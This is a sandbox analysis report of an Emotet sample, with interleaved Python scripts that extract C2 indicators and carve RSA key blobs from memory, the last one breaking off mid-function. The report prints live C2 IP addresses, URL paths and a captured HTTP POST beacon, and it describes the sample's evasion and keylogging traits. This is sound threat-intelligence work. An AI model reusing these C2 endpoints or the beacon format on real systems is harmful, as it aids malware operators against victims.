
Analysis Report Eacu0dRnuP

Overview

General Information

Sample Name: Eacu0dRnuP (renamed file extension from none to exe)
Analysis ID: 317638
MD5: e79d85ef787e5ee5ab0c1c4962325648
SHA1: 137381e0ccf7bb74f2a6b603b0ad7137166a4890
SHA256: dd4b3697f598fcfb9a58ab0f075f7dce217c192ef5b2af6d9377192f60ce3720

Most interesting Screenshot:

Detection

Emotet
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • Eacu0dRnuP.exe (PID: 2160 cmdline: 'C:\Users\user\Desktop\Eacu0dRnuP.exe' MD5: E79D85EF787E5EE5AB0C1C4962325648)
    • KBDTUQ.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\fphc\KBDTUQ.exe MD5: E79D85EF787E5EE5AB0C1C4962325648)
  • svchost.exe (PID: 1092 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 484 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4928 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1752 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5984 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2988 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6216 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6252 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6264 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet (extracted configuration: a C2 list of IP:port pairs and an RSA public key)


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.230764484.0000000002861000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.230167872.00000000024A4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.494965360.0000000002214000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.495069915.0000000002261000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.KBDTUQ.exe.2260000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0.2.Eacu0dRnuP.exe.2860000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmp; Malware Configuration Extractor: Emotet (extracted C2 list and RSA public key)
Multi AV Scanner detection for submitted file
Source: Eacu0dRnuP.exe; Virustotal: Detection: 59%
Source: Eacu0dRnuP.exe; Metadefender: Detection: 43%
Source: Eacu0dRnuP.exe; ReversingLabs: Detection: 62%
Machine Learning detection for sample
Source: Eacu0dRnuP.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe; Code function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_02262650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_02262290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_02261FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe; Code function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe; Code function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.3:49724 -> 80.227.52.78:80
Source: Traffic; Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.3:49730 -> 51.89.199.141:8080
Source: global traffic; TCP traffic: 192.168.2.3:49730 -> 51.89.199.141:8080
Source: Joe Sandbox View; IP Address: 80.227.52.78
Source: Joe Sandbox View; IP Address: 51.89.199.141
Source: Joe Sandbox View; ASN Name: DU-AS1AE
Source: Joe Sandbox View; ASN Name: OVHFR
Source: global traffic; TCP traffic: 192.168.2.3:49724 -> 80.227.52.78:80
Source: global traffic; HTTP traffic detected:
    POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 51.89.199.141/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQ
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 51.89.199.141:8080
    Content-Length: 4612
    Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 80.227.52.78
Source: unknown; TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe; Code function: 3_2_022629B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,
Source: unknown; HTTP traffic detected:
    POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 51.89.199.141/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQ
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 51.89.199.141:8080
    Content-Length: 4612
    Cache-Control: no-cache
Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp; String found in binary or memory: http://51.89.199.141:8080/kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgq
Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp; String found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/
Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp; String found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/$f
Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp; String found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/-f
Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmp; String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.498030150.0000022687860000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmp; String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp; String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp; String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp; String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmp; String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmp; String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmp; String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmp; String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313951325.000001DF72439000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000B.00000002.313913232.000001DF72425000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgq
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/$f
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/-f
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.498030150.0000022687860000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
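The URL list above mixes two very different things: Microsoft telemetry and map-service endpoints carved from Windows' own svchost.exe instances, and the two hard-coded HTTP C2 servers carved from the dropped copy KBDTUQ.exe (one of them on the non-standard port 8080). The following script, an added example rather than sandbox or Emotet code, parses report lines of this shape, keeps only strings from the sample's own processes, collapses the memory-garbage variants (`/$f`, `/-f`) of the same URI onto one host:port entry and flags non-default ports. The report lines embedded in it are copied from this page; the process names in `SAMPLE_PROCS` are the two names this report gives the sample.

```python
"""Pull C2 indicators out of Joe Sandbox 'String found in binary or memory' lines.

Added example for this report, not part of the sandbox's own tooling. The
regex accepts both the fused form seen in the extracted page (source column
run straight into the signature text) and a ' | ' separated form.
"""
import re
from urllib.parse import urlsplit

# Constructed input: lines copied from this report section.
REPORT_LINES = [
    # the dropped Emotet binary's own strings
    "Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgq",
    "Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/",
    "Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp | String found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/$f",
    "Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp | String found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/-f",
    # Windows service processes: Microsoft endpoints, not indicators
    "Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0",
    "Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>[^,]+),\s*(?P<dumps>.+?\.sdmp)\s*(?:\|\s*)?"
    r"String found in binary or memory:\s*(?P<url>\S+)$"
)

# Processes that belong to the sample: the submitted file and the copy it
# dropped under SysWOW64 (both named in this report).
SAMPLE_PROCS = {"Eacu0dRnuP.exe", "KBDTUQ.exe"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_line(line):
    """Return (process, dump ids, url) for a URL signature line, else None."""
    m = LINE_RE.match(line.strip())
    return (m["proc"], m["dumps"], m["url"]) if m else None


def extract_c2(lines, procs=SAMPLE_PROCS):
    """Group URLs from the sample's own processes by (host, port).

    Strings carved from memory often carry trailing junk (the '$f' / '-f'
    variants above), so every path seen for a host:port is kept and the
    caller picks the shortest one as the clean URI prefix.
    """
    found = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, dumps, url = parsed
        if proc not in procs:
            continue
        parts = urlsplit(url)
        try:
            port = parts.port
        except ValueError:          # non-numeric port in a garbled string
            continue
        if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
            continue
        port = port or DEFAULT_PORTS[parts.scheme]
        entry = found.setdefault((parts.hostname, port), {
            "scheme": parts.scheme,
            "nonstandard_port": port != DEFAULT_PORTS[parts.scheme],
            "paths": set(),
            "dumps": set(),
        })
        entry["paths"].add(parts.path)
        entry["dumps"].add(dumps)
    return found


def ioc_list(found):
    """Flatten to sorted (host, port, shortest path) tuples for a blocklist."""
    return sorted((host, port, min(entry["paths"], key=len))
                  for (host, port), entry in found.items())


if __name__ == "__main__":
    for host, port, path in ioc_list(extract_c2(REPORT_LINES)):
        print(f"{host}:{port}{path}")
```

On this report the result is the two KBDTUQ.exe servers only; the svchost.exe strings are dropped by the process filter rather than by any allowlist of Microsoft domains, which is the safer default when the sandbox host runs real Windows services alongside the sample.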
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0041F8D4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0041F8D4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.230764484.0000000002861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.230167872.00000000024A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.494965360.0000000002214000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.495069915.0000000002261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.494701716.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.KBDTUQ.exe.2260000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Eacu0dRnuP.exe.2860000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02262650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
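The API chain in the function above (CryptDecodeObjectEx followed by CryptImportKey, alongside CryptGenKey for a fresh session key) is the CryptoAPI idiom for importing a DER-encoded RSA public key: CryptDecodeObjectEx turns the embedded DER into a PUBLICKEYBLOB and CryptImportKey loads it. After import that blob sits in process memory in Microsoft's documented BLOBHEADER + RSAPUBKEY + little-endian-modulus layout, whose `RSA1` magic makes it easy to carve from a memory dump. The script below is an added example, not the sample's or the sandbox's code: it builds and parses that blob layout and scans a buffer for it. The modulus and the "dump" it is placed in are constructed for the demonstration; the page does not show the key this sample carries, and nothing here is it.

```python
"""Parse and carve CryptoAPI RSA PUBLICKEYBLOBs (the 'RSA1' layout).

Added example for this report, not code from the sample or the sandbox. The
layout is BLOBHEADER (bType, bVersion, reserved, aiKeyAlg) + RSAPUBKEY
(magic, bitlen, pubexp) + modulus of bitlen/8 bytes, little-endian, which is
what CryptImportKey consumes after CryptDecodeObjectEx has produced it.
"""
import hashlib
import struct

PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType
CUR_BLOB_VERSION = 0x02       # BLOBHEADER.bVersion
CALG_RSA_KEYX = 0x0000A400    # BLOBHEADER.aiKeyAlg for key-exchange keys
CALG_RSA_SIGN = 0x00002400    # BLOBHEADER.aiKeyAlg for signature keys
RSA1_MAGIC = b"RSA1"          # RSAPUBKEY.magic = 0x31415352, little-endian
HEADER_LEN = 8 + 12           # BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes)


def build_publickeyblob(modulus, exponent=65537, alg=CALG_RSA_KEYX):
    """Serialise an RSA public key as a PUBLICKEYBLOB."""
    bitlen = (modulus.bit_length() + 7) // 8 * 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, alg)
    rsapubkey = RSA1_MAGIC + struct.pack("<II", bitlen, exponent)
    return header + rsapubkey + modulus.to_bytes(bitlen // 8, "little")


def parse_publickeyblob(blob):
    """Parse a PUBLICKEYBLOB; raise ValueError if it is not a sane RSA1 blob."""
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for BLOBHEADER + RSAPUBKEY")
    btype, bversion, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    if btype != PUBLICKEYBLOB or bversion != CUR_BLOB_VERSION:
        raise ValueError("not a PUBLICKEYBLOB")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN):
        raise ValueError("unexpected aiKeyAlg 0x%08x" % alg)
    if blob[8:12] != RSA1_MAGIC:
        raise ValueError("missing RSA1 magic")
    bitlen, exponent = struct.unpack_from("<II", blob, 12)
    if bitlen % 8 or not 512 <= bitlen <= 16384:
        raise ValueError("implausible key length %d" % bitlen)
    nbytes = bitlen // 8
    if len(blob) < HEADER_LEN + nbytes:
        raise ValueError("truncated modulus")
    modulus = int.from_bytes(blob[HEADER_LEN:HEADER_LEN + nbytes], "little")
    return {"alg": alg, "bits": bitlen, "e": exponent, "n": modulus}


def carve_rsa_public_keys(buf):
    """Scan a memory dump for RSA1 blobs; return [(offset, parsed key), ...]."""
    keys = []
    pos = buf.find(RSA1_MAGIC)
    while pos != -1:
        start = pos - 8                 # BLOBHEADER precedes the magic
        if start >= 0:
            try:
                keys.append((start, parse_publickeyblob(buf[start:])))
            except ValueError:
                pass                    # an 'RSA1' that is not a key blob
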